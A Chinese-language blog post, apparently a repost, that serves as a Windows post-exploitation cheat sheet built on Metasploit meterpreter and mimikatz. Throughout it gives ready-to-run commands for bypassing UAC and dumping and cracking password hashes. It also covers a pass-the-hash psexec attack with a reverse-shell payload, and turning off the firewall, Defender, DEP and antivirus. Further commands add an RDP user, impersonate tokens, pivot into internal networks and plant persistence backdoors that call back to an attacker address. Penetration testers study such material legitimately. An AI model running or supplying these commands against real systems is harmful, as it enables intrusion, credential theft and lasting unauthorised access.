后渗透流程【建议收藏】

admin
admin
admin
138733
文章
114
评论
2022年3月30日11:56:17评论66 views字数 3556阅读11分51秒阅读模式

后渗透流程

权限提升

绕过UAC

msf模块

  • Exploit/windows/local/bypassuac

  • Exploit/windows/local/bypassuac_injection

  • Exploit/windows/local/bypassuac_vbs

系统提权

提高程序运行级别

  • msf模块(Exploit/windows/local/ask)
    缺点:需要uac交互

后渗透信息收集

msf模块(post)

  • 获取目标主机的分区情况:post/windows/gather/forensics/enum_drives

  • 判断是否为虚拟机:
    post/windows/gather/checkvm

  • 开启了哪些服务:
    post/windows/gather/enum_applications

  • 查看共享:
    post/windows/gather/enum_shares

  • 获取主机最近的系统操作:
    post/windows/gather/dumplinks

  • 查看补丁:
    post/windows/gather/enum_applicationsenum_patches

  • scraper脚本
    路径:/usr/share/metasploit-framework/scripts/meterpreter

(meterpreter下run scraper)
保存信息的目录:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx

  • winenum脚本(meterpreter下run winenum)

数据包抓获

目的:抓获与外围的交互
使用地点:找不到进入内网的方法(主机在防火墙,开放端口少,是服务器的子网)

抓包

sniffer会过滤掉自身merterpreter产生的流量,直接去抓取和主机相关的数据包信息

  • 加载sniffer:load sniffer

  • 查看网卡信息;sniffer_interfaces

  • 开启监听:sniffer_start 1

  • 导出数据包:sniffer_dump 1 1.cap

解包

  • auxiliary/sniffer/psnuffle

meterpreter模块

  • run packetrecorder

  • run post/windows/manage/rpcapd_start

抓hash

基础:密码格式:
用户名称:RID:LM-HASH值:NT-HASH值

  • hashdump

  • run post/windows/gather/smart_hashdump

    • 检查权限和系统类型

    • 检查是否是域控制服务器

    • 从注册表读取hash,注入lsass进程

    • 如果是08server并且具有管理员权限,直接getsystem尝试提权

    • 如果是win7且UAC关闭并具有管理员权限,从注册表读取

    • 03/XP直接getsystem,从注册表读取hash


      • mimikatz(已集合到mimikatz)

      • 需要administrator及以上权限,需要免杀

      • privilege::debug #查看权限

      • sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话)

      • sekurlsa::ekeys #获取kerberos加密凭证

    hash破解

    • Hashcat

    文章:
    (https://www.anquanke.com/post/id/177123)

    • hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

    hash传递攻击

    UAC注册表:
    HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System

    进shell,中文乱码,输入chcp 65001
    shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f

    • MSF

    • exploit/windows/smb/psexec

    use exploit/windows/smb/psexec
    set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128

    set RHOST 192.168.206.101
    set SMBUser administrator
    set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0
    exploit

    • mimikkatz
      sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

    关闭防火墙及杀毒软件

    -关闭防火墙(shell)
    - Netsh advfirewall set allprofiles state off(管理员及以上权限)

    • 关闭Denfender(shell)

      • Net stop windefend

    • 关闭DEP(shell)

      • Bcdedit.exe /set {current} nx AlwaysOff

    • 关闭杀毒软件(meterpreter)

      • Run killav

      • Run post/windows/manage/killava

    远程桌面

    • 开启远程桌面

      • run post/windows/manage/enable_rdp(方式一)

      • run getgui -e (方式二)

      run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt(关闭远程桌面)

      • 开启远程桌面并添加新用户

        • run getgui -u root -p pass

开启远程桌面并绑定在8888端口

`run getgui -e -f 8888`

  • 截图

    • load espia

    • screengrab

  • 远程桌面连接
    kali下:rdesktop -u root -p 123 192.168.85.157

令牌假冒

  • windows安全相关概念

    • session

    • Windows Station

    • Desktop

    • Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限

  • incognito

    • load incognito

    • list_tokens -u
      (非交互的token多出来一条EAAdministrator)

    • impersonate_token EAAdministrator

    • 成功登陆

跳板攻击

  • pivoting

    • 利用已经被入侵的主机作为跳板来攻击网络中其他系统

    • 访问由于路由问题而不能直接访问的内网系统

添加路由

  • 方式一:run autoroute -s 192.168.102.0/24

  • 方式二:run post/multi/manage/autoroute(更新)

  • 利用win7攻击内网服务器

  • 扫描内网网络

    • run post/windows/gather/arp_scanner rhosts=192.168.102.0/24

    • use auxiliary/scanner/portscan/tcp

ProxyChains代理设置

  • 配置:vim /etc/proxychain.conf(加上ip)

  • Socket代理

    • auxiliary/server/socks4a

ProxyChains

  • ProxyChains是为GUNLinux操作系统而开发的工具,任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。

  • proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx

后门植入

  • meterpreter后门:Metsvc

    • 通过服务启动

    • run metsvc -A #设定端口,上传后门文件

  • meterpreter后门:persistence

    • 通过启动型启动

    • 特性:定期会连,系统启动时回连,自动运行

    • run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111

原文:https://blog.csdn.net/weixin_44255856/article/details/1


关注公众号了解更多资讯


原文始发于微信公众号(纵横安全圈):后渗透流程【建议收藏】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日11:56:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   后渗透流程【建议收藏】https://cn-sec.com/archives/854889.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息